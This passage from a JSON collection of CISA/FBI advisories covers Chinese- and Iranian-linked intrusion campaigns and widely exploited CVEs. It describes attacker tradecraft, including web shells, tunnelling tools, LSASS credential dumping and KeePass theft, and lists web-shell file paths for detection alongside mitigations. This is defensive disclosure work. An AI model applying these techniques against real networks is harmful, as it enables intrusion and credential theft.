Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. 
Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. 
This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. 
The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). 
It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. 
From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. 
The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. 
\n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. 
\n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. 
\n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to access sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. 
\n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. 
\n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902"], "modified": 
"2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:35:47", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors.\n\nThis alert provides details on vulnerabilities routinely exploited by foreign cyber actors\u2014primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/ >)\u2014to help organizations reduce the risk of these foreign threats.\n\nForeign cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available.\n\nThe public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries\u2019 operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.\n\nFor indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see the each entry within the Mitigations section below. 
Click here for a PDF version of this report.\n\n### Technical Details\n\n## Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\nU.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.\n\n * According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft\u2019s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts.\n * Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft\u2019s OLE technology.\n * As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability\u2014CVE-2012-0158\u2014that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective.\n * Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time.\n * A U.S. 
industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study\u2019s top 10 most exploited flaws also appear on this Alert\u2019s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security.\n\n## Vulnerabilities Exploited in 2020\n\nIn addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020:\n\n * Malicious cyber actors are increasingly targeting unpatched Virtual Private Network vulnerabilities. \n * An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild.\n * An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.\n * March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and left them vulnerable to attack.\n * Cybersecurity weaknesses\u2014such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans\u2014have continued to make organizations susceptible to ransomware attacks in 2020.\n\n### Mitigations\n\nThis Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. 
Government recommend that organizations transition away from any end-of-life software.\n\n## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\n**Note:** The lists of associated malware corresponding to each CVE below is not meant to be exhaustive but instead is intended to identify a malware family commonly associated with exploiting the CVE. \n\n_**CVE-2017-11882**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products\n * Associated Malware: Loki, FormBook, Pony/FAREIT\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\n_**CVE-2017-0199**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1\n * Associated Malware: FINSPY, LATENTBOT, Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\n_**CVE-2017-5638**_\n\n * Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n * Associated Malware: JexBoss\n * Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1\n * More Detail: \n * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A>\n * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638>\n\n_**CVE-2012-0158**_\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n * Associated 
Malware: Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa19-339a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n_**CVE-2019-0604**_\n\n * Vulnerable Products: Microsoft SharePoint\n * Associated Malware: China Chopper\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604>\n\n_**CVE-2017-0143**_\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143>\n\n_**CVE-2018-4878**_\n\n * Vulnerable Products: Adobe Flash Player before 28.0.0.161\n * Associated Malware: DOGCALL\n * Mitigation: Update Adobe Flash Player installation to the latest version\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>\n\n**_CVE-2017-8759_**\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7\n * Associated Malware: FINSPY, FinFisher, WingBird\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759>\n * 
